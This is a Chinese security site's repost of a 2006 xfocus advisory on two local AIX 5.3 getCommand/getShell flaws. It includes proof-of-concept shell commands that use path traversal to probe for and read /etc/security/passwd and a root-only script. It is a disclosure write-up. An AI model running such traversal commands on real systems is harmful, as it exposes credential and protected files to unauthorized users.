首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities
来源:www.xfocus.net 作者:xfocus 发布时间:2006-01-03  

[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities

Affected version : aix5.3 ml03,Other versions not test,
should also be affected.
Vendor: http://www.ibm.com/
Where: Local

XFOCUS (http://www.xfocus.org) had already discovered
some vulnerabilities in getCommand&getShell.

After apply newest patch,getCommand&getShell still have two
vulnerabilities,That is
1: exploit that,a attacker can determine file be exist or not,which
should can't readed
2: exploit that,a attacker can read in any shell document(include no
permission file) has the cd operation the following partial content.

example test:
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root security 512 2005-12-22 21:09 /etc/security/
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh

ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

-bash-3.00$


TIME LINE:
December,26 2005 - Initial vendor notification
.....Waiting.....Waiting....
January 1, 2006 - Public disclosure(vendor not reply)

--EOF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Microsoft IIS远程拒绝服务漏洞
·Windows GDI32.DLL WMF 渲染引擎
·Microsoft Windows异步过程调用
·Xlight FTP Server远程缓冲区溢
·[xfocus-SD-060314]Microsoft Of
·Microsoft Internet Explorer HT
·ipb search.php 漏洞分析及思考
·Microsoft Internet Explorer文
·IE mhtml redirection漏洞利用方
·Microsoft Internet Explorer CO
·Php5 GPC绕过缺陷
·EXCEL 2000/XP表长度缓冲区溢出
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved